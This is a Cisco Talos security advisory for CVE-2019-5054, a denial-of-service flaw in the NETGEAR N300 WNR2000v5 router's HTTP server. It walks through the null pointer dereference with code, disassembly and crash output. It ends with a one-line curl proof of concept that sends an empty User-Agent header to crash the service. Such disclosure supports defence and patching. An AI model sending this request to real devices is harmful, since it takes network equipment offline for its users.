Headline
CVE-2019-5054: TALOS-2019-0831 || Cisco Talos Intelligence Group
An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.
Summary
An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.
Tested Versions
NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70
Product URLs
https://www.netgear.com/support/product/WNR2000v5
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-476: NULL Pointer Dereference
Details
The NETGEAR n300 is a small, affordable wireless router with minimal features.
Each HTTP request made to the HTTP daemon populates the following structure located at the hard-coded address 0x4cabb0:
struct http_request { char method[8]; float version; char url[256]; char headerbuf[4096]; char *authorization; char *host; char *accept; char *accept_charset; char *accept_encoding; char *accept_language; char *connection; char *cookie; char *referer; char *user_agent; char *content_type; char *content_length; char *soapaction; }
When attempting to connect to a page that requires authentication, the function do_auth_check() calls another function called send_authenticate(). This function contains a section of code that concatenates the received User-Agent to the end of the client IP address (after it is converted to a string). This string is then supposed to be compared against the contents of the file “/tmp/AUTH_login_browser” which should contain the IP Address and User-Agent of the previously authenticated client.
The problem is when req->userAgent doesn’t get populated — there isn’t a check against this. This results in a NULL pointer dereference and crashes the service:
agent = sa_straddr(&peeraddr); // Convert binary IP address to a string at 0x4b1c98
strcpy(curBrowser,agent); // Copy string
strcat(curBrowser,req.user_agent); // Append req->user_agent to IP address
[Annotated Disassembly / Decompilation output]
0x4097f8 <send_authenticate+412>: lw a1,4400(s5) // req->user_agent
0x4097fc <send_authenticate+416>: lw t9,-31484(gp) // load address of strcat()
0x409800 <send_authenticate+420>: jalr t9 // crash @ call strcat(curBrowser, agent)
0x409804 <send_authenticate+424>: move a0,s0 // client IP address string
Crash Information
0x2ab59f88: bnez v0,0x2ab59f84
0x2ab59f8c: addiu v1,v1,1
0x2ab59f90: addiu v1,v1,-2
=> 0x2ab59f94: lb v0,0(a1) // $a1 == 0x00
0x2ab59f98: addiu v1,v1,1
0x2ab59f9c: addiu a1,a1,1
0x2ab59fa0: bnez v0,0x2ab59f94
0x2ab59fa4: sb v0,0(v1)
Stopped reason: SIGSEGV
0x2ab59f94 in ?? ()
peda-mips > x/32xw $a1
0x0: Cannot access memory at address 0x0
Exploit Proof of Concept
$ curl -H 'User-Agent:' http://192.168.1.1/UPG_upgrade.htm
Timeline
2019-05-08 - Vendor Disclosure
2019-09-09- Public Release
Discovered by Dave McDaniel of Cisco Talos.